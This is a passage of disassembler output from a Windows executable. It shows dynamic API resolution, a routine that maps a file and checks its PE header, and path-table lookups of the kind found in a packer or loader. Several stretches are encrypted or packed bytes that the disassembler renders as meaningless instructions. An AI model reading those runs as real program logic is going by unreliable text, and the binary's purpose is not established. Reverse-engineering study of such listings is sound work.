mov eax, [ebp+var_8]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117E8, eax
push offset aRemovefontreso ; "RemoveFontResourceA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117EC, eax
push offset aBeginpaint ; "BeginPaint"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117F0, eax
push offset aEndpaint ; "EndPaint"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117F4, eax
push offset aGetobjecta ; "GetObjectA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117F8, eax
push offset aSelectobject_0 ; "SelectObject"
mov edx, [ebp+var_8]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_5117FC, eax
push offset aDeleteobject_0 ; "DeleteObject"
mov eax, [ebp+var_8]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511800, eax
push offset aBitblt_0 ; "BitBlt"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511804, eax
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511808, eax
push offset aSetactivewindo ; "SetActiveWindow"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51180C, eax
push offset aSetforegroundw ; "SetForegroundWindow"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511810, eax
push offset aRegisterclasse ; "RegisterClassExA"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511814, eax
push offset aGetsystemmetri ; "GetSystemMetrics"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511818, eax
push offset aCreatewindowex ; "CreateWindowExA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51181C, eax
push offset aGetmessagea ; "GetMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511820, eax
push offset aTranslatemessa ; "TranslateMessage"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511824, eax
push offset aDispatchmessag ; "DispatchMessageA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511828, eax
push offset aDestroywindo_0 ; "DestroyWindow"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51182C, eax
push offset aEnumwindows ; "EnumWindows"
mov eax, [ebp+var_10]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511830, eax
push offset aDefwindowproca ; "DefWindowProcA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511834, eax
push offset aPostmessagea ; "PostMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511838, eax
push offset aCreatethread ; "CreateThread"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_51183C, eax
mov [ebp+var_4], offset dword_5116A4
mov [ebp+var_14], offset dword_511840
jmp short loc_4FEB7A
; ---------------------------------------------------------------------------
loc_4FEB71: ; CODE XREF: sub_4FE2E0:loc_4FEBA9�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_4FEB7A: ; CODE XREF: sub_4FE2E0+88F�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_14]
jz short loc_4FEBAB
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_4FEBA9
push 0
push 0
push 0
mov ecx, [ebp+var_4]
sub ecx, offset dword_5116A0
sar ecx, 2
sub ecx, 10FFEFFFh
push ecx
call ds:dword_50E00C ; RaiseException
loc_4FEBA9: ; CODE XREF: sub_4FE2E0+8A8�j
jmp short loc_4FEB71
; ---------------------------------------------------------------------------
loc_4FEBAB: ; CODE XREF: sub_4FE2E0+8A0�j
mov esp, ebp
pop ebp
retn
sub_4FE2E0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E298
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-24h], 0FFFFFFFFh
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:dword_5116A8 ; CreateFileA
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short loc_4FEC6C
push 0
mov ecx, [ebp-24h]
push ecx
call ds:dword_511700 ; GetFileSize
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0FFFFFFFFh
jz short loc_4FEC6C
push 0
mov edx, [ebp-1Ch]
push edx
push 0
push 2
push 0
mov eax, [ebp-24h]
push eax
call ds:dword_5116B0 ; CreateFileMappingA
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_4FEC6C
mov ecx, [ebp-1Ch]
push ecx
push 0
push 0
push 4
mov edx, [ebp-20h]
push edx
call ds:dword_51176C ; MapViewOfFile
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jnz short loc_4FEC76
loc_4FEC6C: ; CODE XREF: _5:004FEC19�j _5:004FEC2E�j ...
mov ecx, 0EF000001h
call sub_508342
loc_4FEC76: ; CODE XREF: _5:004FEC6A�j
mov eax, [ebp-28h]
mov ecx, [ebp-28h]
add ecx, [eax+3Ch]
mov [ebp-30h], ecx
mov edx, [ebp-30h]
cmp dword ptr [edx], 4550h
jz short loc_4FEC97
mov ecx, 0EF000002h
call sub_508342
loc_4FEC97: ; CODE XREF: _5:004FEC8B�j
mov eax, ds:off_51169C
mov [ebp-34h], eax
mov ecx, [ebp-30h]
mov edx, [ebp+10h]
sub edx, [ecx+34h]
mov [ebp-2Ch], edx
push 1190000h
call near ptr loc_4FDB7D+1
add ds:11417799h, cl ; CODE XREF: _5:004FECCB�j
stosd
add eax, 1EEE403Fh
sub al, 39h
inc esi
cmp ebx, [eax+1F877A6Dh]
in al, dx
jle short near ptr loc_4FECB5+2
inc ebx
cwde
out dx, al
pop es
xor eax, [ebx+78F72316h]
adc byte ptr [edi+64h], 71h
jle short near ptr loc_4FED3B+2
xchg eax, ecx
db 2Eh
out 77h, eax
dec edi
sbb esp, edi
jp short loc_4FED3B
lds edx, [ecx+4B7AFC62h]
retn
; ---------------------------------------------------------------------------
db 7Eh, 24h, 82h
dd 0B61C1F80h, 0E756D0C3h, 1E40126Fh, 6B46D1A8h, 0EE0CA412h
dd 0D165F518h, 0AB6AFC15h, 0F6588337h, 5A597004h, 1A93DEAh
dd 35E370C2h, 328E108Eh, 0EA5487D7h, 599515B8h, 0DC957533h
dd 2AB9E510h, 0F6E956BFh, 41D55588h
db 0F7h, 6Ch, 0DAh
; ---------------------------------------------------------------------------
loc_4FED3B: ; CODE XREF: _5:004FECE4�j _5:004FECDB�j
adc edi, [edi+14D244FBh]
stc
jnz short loc_4FED91
loc_4FED44: ; CODE XREF: _5:004FED45�j
xchg eax, edi
loop loc_4FED44
rol esi, 1
inc esp
stosb
arpl bx, si
and ebx, [edx+ecx*2+1D4529E4h] ; CODE XREF: _5:004FEDC7�j
out 68h, al
mov esi, 7AF0DD8Eh
mov bl, 0DFh
xchg eax, ebp
jno short loc_4FED9A
jg short loc_4FED80
shr byte ptr [ebx], cl
jg short loc_4FEDCE
mov bh, 10h
cmpsd
mov ah, 2Ah
hlt
; ---------------------------------------------------------------------------
dd 693DAD50h, 3BA234CFh, 6A0C46DFh, 8E90F8F4h, 59E2CEABh
; ---------------------------------------------------------------------------
loc_4FED80: ; CODE XREF: _5:004FED60�j
mov ah, [edx+edx*4]
aam 3Bh
stosd
push 7118CCF6h
jle short loc_4FEDB7
add eax, eax
push 0FFFFFFC4h
loc_4FED91: ; CODE XREF: _5:004FED42�j
outsb
loope near ptr loc_4FEDEE+3
cmpsb
cmp al, 76h
inc edi
iret
; ---------------------------------------------------------------------------
daa
loc_4FED9A: ; CODE XREF: _5:004FED5E�j
jge short near ptr loc_4FEDC9+1
pop edi
or esi, ebp
aas
jnb short near ptr loc_4FEE04+2
db 67h
das
mov bl, 0C0h
and al, 0E9h
sbb [ebx], cl
dec cl
pop esi
aam 35h
inc edx
dec edi
pop esp
loc_4FEDB2: ; DATA XREF: _6:0050E2A8�o
and byte ptr [esi+3Bh], 91h
popf
loc_4FEDB7: ; CODE XREF: _5:004FED8B�j
stosb
mov bh, 7
loc_4FEDBA: ; DATA XREF: _6:0050E2AC�o
pop edx
mov ebx, 0EE403F03h
pop ds
sub al, 39h
inc esi
loc_4FEDC4: ; CODE XREF: _5:004FEDD4�j
cmp edi, [ecx+6Ch]
jp short near ptr loc_4FED4D+3
loc_4FEDC9: ; CODE XREF: _5:loc_4FED9A�j
jl short near ptr loc_4FEDD6+6
inc ebx
inc esp
aaa
loc_4FEDCE: ; CODE XREF: _5:004FED64�j
nop
nop
xor edx, edx
test edx, edx
jnz short loc_4FEDC4
loc_4FEDD6: ; CODE XREF: _5:loc_4FEDC9�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4FEDE4
jmp short loc_4FEE15
; =============== S U B R O U T I N E =======================================
sub_4FEDE4 proc near ; CODE XREF: _5:004FEDDD�p
; DATA XREF: _6:0050E2A0�o
cmp dword ptr [ebp-28h], 0
jz short loc_4FEDF4
mov eax, [ebp-28h]
push eax
loc_4FEDEE: ; CODE XREF: _5:004FED92�j
call ds:dword_5117A0 ; UnmapViewOfFile
loc_4FEDF4: ; CODE XREF: sub_4FEDE4+4�j
cmp dword ptr [ebp-20h], 0
jz short loc_4FEE04
mov ecx, [ebp-20h]
push ecx
call ds:dword_5116A4 ; CloseHandle
loc_4FEE04: ; CODE XREF: sub_4FEDE4+14�j
; _5:004FEDA0�j
cmp dword ptr [ebp-24h], 0
jz short locret_4FEE14
mov edx, [ebp-24h]
push edx
call ds:dword_5116A4 ; CloseHandle
locret_4FEE14: ; CODE XREF: sub_4FEDE4+24�j
retn
sub_4FEDE4 endp
; ---------------------------------------------------------------------------
loc_4FEE15: ; CODE XREF: _5:004FEDE2�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E2B0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE88h
push ebx
push esi
push edi
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 105h
call sub_50835A
add esp, 4
mov [ebp-184h], eax
mov eax, [ebp-184h]
mov [ebp-1Ch], eax
push 104h
mov ecx, [ebp-1Ch]
push ecx
push 0
call ds:dword_511718 ; GetModuleHandleA
push eax
call ds:dword_511714 ; GetModuleFileNameA
mov edx, [ebp+0Ch]
add edx, 82h
mov [ebp-24h], edx
mov eax, [ebp-24h]
mov ecx, [eax]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp-20h], ecx
cmp dword ptr [ebp-20h], 0
jz loc_4FEFFE
lea ecx, [ebp-160h]
call sub_507798
mov dword ptr [ebp-164h], 10h
push 290000h
call near ptr loc_4FDB7D+1
nop
popf
sub ebp, esi
mov cl, 93h
cmp esi, [ebp-2071CF1Dh]
adc [esi+edx], esp
cmp eax, 7CBB222Fh
push ecx
cmc
dec esp
retn
; ---------------------------------------------------------------------------
db 97h, 0B9h, 0ADh
dd 8ABDEFA0h, 9EAD89FBh, 2913CC7h, 0B285F704h, 96CCFC1Ch
dd 7F09E16h, 414E5A1Bh, 5268559Ah, 0CEE6F301h, 5A4DC906h
dd 0AA81500Fh, 2EF9409Bh, 66792330h, 0F898C230h, 0DBDCAA42h
dd 6D7A86E7h, 0CA3421CFh, 12121F2Ch, 2E21267Bh, 41556C53h
dd 7AA1946Fh, 5A2D4F5Ch, 37742DE4h, 3A4FF67Eh, 345119B4h
dd 65810DFEh, 5D294B58h, 6AF5E8E6h, 36541C2Ch, 95B155ABh
dd 0AD011488h, 0A7053D6Bh, 0EB46731h, 0C4A9AD9Ah, 3BEAABB8h
dd 2A000177h, 11364351h, 0F5037066h, 3E3124E8h, 0F96AB34Bh
dd 59670CFAh, 0DB0D434Ch, 0F081716Eh, 0FFB6D7E4h, 8996A2CFh
dd 2180E38Ch, 212F443Ah, 96907314h, 0CDC6D3E1h, 8593E8D6h
dd 24A5A778h, 1C5D4D32h, 0DDE20310h, 0C1357DA8h, 818FECC2h
dd 8EF4A374h, 0E560C6CBh, 0F2E200F3h, 4E41A771h, 82751533h
dd 5D21748Fh, 90902F3Ch, 0C085C033h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_4FEFFE: ; CODE XREF: _5:004FEEC0�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4FF00C
jmp short loc_4FF025
; =============== S U B R O U T I N E =======================================
sub_4FF00C proc near ; CODE XREF: _5:004FF005�p
; DATA XREF: _6:0050E2B8�o
mov ecx, [ebp-1Ch]
mov [ebp-188h], ecx
mov edx, [ebp-188h]
push edx
call sub_5083DD
add esp, 4
retn
sub_4FF00C endp
; ---------------------------------------------------------------------------
loc_4FF025: ; CODE XREF: _5:004FF00A�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF036 proc near ; CODE XREF: sub_50B1EA+1F�p
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004FF153 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E2C0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
or [ebp+var_1C], 0FFFFFFFFh
push 0
lea eax, [ebp+var_1C]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_500346
test eax, eax
jz loc_4FF153
cmp [ebp+var_1C], 0FFFFFFFFh
jz loc_4FF153
mov eax, ds:dword_5118E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4FF0A7
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4FF0AB
; ---------------------------------------------------------------------------
loc_4FF0A7: ; CODE XREF: sub_4FF036+5C�j
and [ebp+var_30], 0
loc_4FF0AB: ; CODE XREF: sub_4FF036+6F�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_4FF153
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4FF120
push [ebp+var_1C]
call sub_505456
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
cmp [ebp+var_20], 0
jnz short loc_4FF0FF
push ds:off_50E4F8
push 1Fh
push ds:off_50E4FC
call sub_50848C
loc_4FF0FF: ; CODE XREF: sub_4FF036+B4�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_24], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_4FF155
; ---------------------------------------------------------------------------
loc_4FF120: ; CODE XREF: sub_4FF036+A0�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4FF12B
jmp short loc_4FF153
sub_4FF036 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4FF12B proc near ; CODE XREF: sub_4FF036+EE�p
; DATA XREF: _6:0050E2C8�o
mov eax, ds:dword_5118E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short loc_4FF146
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
loc_4FF146: ; CODE XREF: sub_4FF12B+C�j
lea eax, [ebp-28h]
push eax
push dword ptr [ebp-1Ch]
call sub_500741
retn
sub_4FF12B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4FF036
loc_4FF153: ; CODE XREF: sub_4FF036+40�j
; sub_4FF036+4A�j ...
xor eax, eax
loc_4FF155: ; CODE XREF: sub_4FF036+E8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4FF036
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF166 proc near ; CODE XREF: sub_4FF252+1B5�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_4FF187
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov esi, [ebp+arg_0]
xor eax, eax
repe cmpsb
jnz loc_4FF24A
loc_4FF187: ; CODE XREF: sub_4FF166+C�j
push 5Ch
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
call sub_4FC640
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4FF216
mov eax, [ebp+arg_C]
mov byte ptr [eax], 1
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
inc eax
cmp eax, 80h
jbe short loc_4FF1C6
xor eax, eax
jmp loc_4FF24C
; ---------------------------------------------------------------------------
loc_4FF1C6: ; CODE XREF: sub_4FF166+57�j
mov ecx, [ebp+var_C]
mov esi, [ebp+arg_8]
add esi, [ebp+arg_4]
mov edi, offset byte_511844
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_C]
and ds:byte_511844[eax], 0
mov eax, [ebp+arg_10]
mov dword ptr [eax], offset byte_511844
push offset byte_511844
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_4FC06B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
jmp short loc_4FF24C
; ---------------------------------------------------------------------------
loc_4FF216: ; CODE XREF: sub_4FF166+38�j
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_4FC06B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+var_10]
jmp short loc_4FF24C
; ---------------------------------------------------------------------------
loc_4FF24A: ; CODE XREF: sub_4FF166+1B�j
xor eax, eax
loc_4FF24C: ; CODE XREF: sub_4FF166+5B�j
; sub_4FF166+AE�j ...
pop edi
pop esi
leave
retn 14h
sub_4FF166 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FF252 proc near ; CODE XREF: sub_4FF63E+56�p
; sub_4FF6DE+90�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004FF62B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E2D0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
push offset dword_5118C8
call ds:dword_5116C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_511908, 0
jnz short loc_4FF2A8
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp loc_4FF62D
; ---------------------------------------------------------------------------
loc_4FF2A8: ; CODE XREF: sub_4FF252+3B�j
and [ebp+var_24], 0
lea eax, [ebp+var_24]
push eax
mov eax, ds:dword_511908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_511708 ; GetFullPathNameA
mov [ebp+var_28], eax
push [ebp+var_28]
mov eax, ds:dword_511908
add eax, 810h
push eax
call ds:dword_5117C8 ; CharUpperBuffA
mov ecx, [ebp+var_28]
call sub_501470
mov eax, ds:dword_511908
mov eax, [eax+0Ch]
mov [ebp+var_20], eax
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_30], 0
mov eax, ds:dword_511908
mov ecx, [eax+0C14h]
mov edi, ds:dword_511908
add edi, 10h
mov esi, ds:dword_511908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_4FF614
mov eax, ds:dword_511908
mov eax, [eax+0C14h]
mov ecx, ds:dword_511908
lea eax, [ecx+eax+810h]
mov [ebp+var_3C], eax
and [ebp+var_38], 0
push 5Ch
push [ebp+var_3C]
call sub_4FC700
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_4FF369
mov eax, [ebp+var_34]
sub eax, [ebp+var_3C]
inc eax
mov [ebp+var_38], eax
jmp short loc_4FF395
; ---------------------------------------------------------------------------
loc_4FF369: ; CODE XREF: sub_4FF252+109�j
mov eax, ds:dword_511684
mov eax, [eax+24h]
and eax, 20h
test eax, eax
jnz short loc_4FF391
push 0FFFFFFFFh
and [ebp+var_50], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_50]
jmp loc_4FF62D
; ---------------------------------------------------------------------------
loc_4FF391: ; CODE XREF: sub_4FF252+124�j
and [ebp+var_38], 0
loc_4FF395: ; CODE XREF: sub_4FF252+115�j
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
test ecx, ecx
jnz short loc_4FF3B1
cmp [ebp+arg_8], 0
jnz short loc_4FF3B1
jmp loc_4FF5EB
; ---------------------------------------------------------------------------
loc_4FF3B1: ; CODE XREF: sub_4FF252+152�j
; sub_4FF252+158�j
cmp [ebp+arg_8], 0
jz short loc_4FF3D4
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_4FF3D4
mov eax, [ebp+arg_8]
mov ecx, ds:dword_511908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
inc eax
mov [ebp+var_1C], eax
loc_4FF3D4: ; CODE XREF: sub_4FF252+163�j
; sub_4FF252+16B�j
jmp short loc_4FF3DD
; ---------------------------------------------------------------------------
loc_4FF3D6: ; CODE XREF: sub_4FF252:loc_4FF412�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4FF3DD: ; CODE XREF: sub_4FF252:loc_4FF3D4�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb short loc_4FF414
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
push dword ptr [eax]
push [ebp+var_38]
push [ebp+var_3C]
call sub_4FF166
test eax, eax
jz short loc_4FF412
jmp short loc_4FF414
; ---------------------------------------------------------------------------
loc_4FF412: ; CODE XREF: sub_4FF252+1BC�j
jmp short loc_4FF3D6
; ---------------------------------------------------------------------------
loc_4FF414: ; CODE XREF: sub_4FF252+191�j
; sub_4FF252+1BE�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb loc_4FF5EB
mov edi, [ebp+var_2C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_48], ecx
movzx eax, [ebp+var_30]
test eax, eax
jz short loc_4FF4AC
jmp short loc_4FF441
; ---------------------------------------------------------------------------
loc_4FF43A: ; CODE XREF: sub_4FF252:loc_4FF4AA�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4FF441: ; CODE XREF: sub_4FF252+1E6�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_1C], eax
jnb short loc_4FF4AC
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov edi, [eax]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_48]
add eax, [ebp+var_38]
cmp ecx, eax
jb short loc_4FF4A8
mov ecx, [ebp+var_48]
add ecx, [ebp+var_38]
mov eax, [ebp+var_1C]
shl eax, 4
mov edx, ds:dword_511908
mov edx, [edx+8]
mov eax, [edx+eax]
mov edi, [eax]
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov edx, ds:dword_511908
mov edx, [edx+8]
mov eax, [edx+eax]
mov esi, [eax]
xor eax, eax
repe cmpsb
jz short loc_4FF4AA
loc_4FF4A8: ; CODE XREF: sub_4FF252+21F�j
jmp short loc_4FF4AC
; ---------------------------------------------------------------------------
loc_4FF4AA: ; CODE XREF: sub_4FF252+254�j
jmp short loc_4FF43A
; ---------------------------------------------------------------------------
loc_4FF4AC: ; CODE XREF: sub_4FF252+1E4�j
; sub_4FF252+1F6�j ...
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
mov eax, [ecx+eax+4]
add eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
mov eax, [eax]
mov [ebp+var_44], eax
xor eax, eax
mov edi, [ebp+arg_4]
stosd
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 2Ch
rep stosd
cmp [ebp+var_48], 104h
jnb short loc_4FF505
mov eax, [ebp+var_48]
mov [ebp+var_54], eax
jmp short loc_4FF50C
; ---------------------------------------------------------------------------
loc_4FF505: ; CODE XREF: sub_4FF252+2A9�j
mov [ebp+var_54], 104h
loc_4FF50C: ; CODE XREF: sub_4FF252+2B1�j
mov ecx, [ebp+var_54]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 2Ch
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 130h
stosd
stosd
stosd
stosw
cmp [ebp+var_48], 0Eh
jbe short loc_4FF545
mov [ebp+var_58], 0Eh
jmp short loc_4FF54B
; ---------------------------------------------------------------------------
loc_4FF545: ; CODE XREF: sub_4FF252+2E8�j
mov eax, [ebp+var_48]
mov [ebp+var_58], eax
loc_4FF54B: ; CODE XREF: sub_4FF252+2F1�j
mov ecx, [ebp+var_58]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 130h
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx eax, [ebp+var_30]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_44]
mov ecx, [ecx+8]
mov [eax+20h], ecx
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+4], edx
mov eax, [eax+20h]
mov [ecx+8], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+0Ch], edx
mov eax, [eax+20h]
mov [ecx+10h], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+14h], edx
mov eax, [eax+20h]
mov [ecx+18h], eax
cmp [ebp+arg_8], 0
jz short loc_4FF5D2
mov eax, [ebp+arg_8]
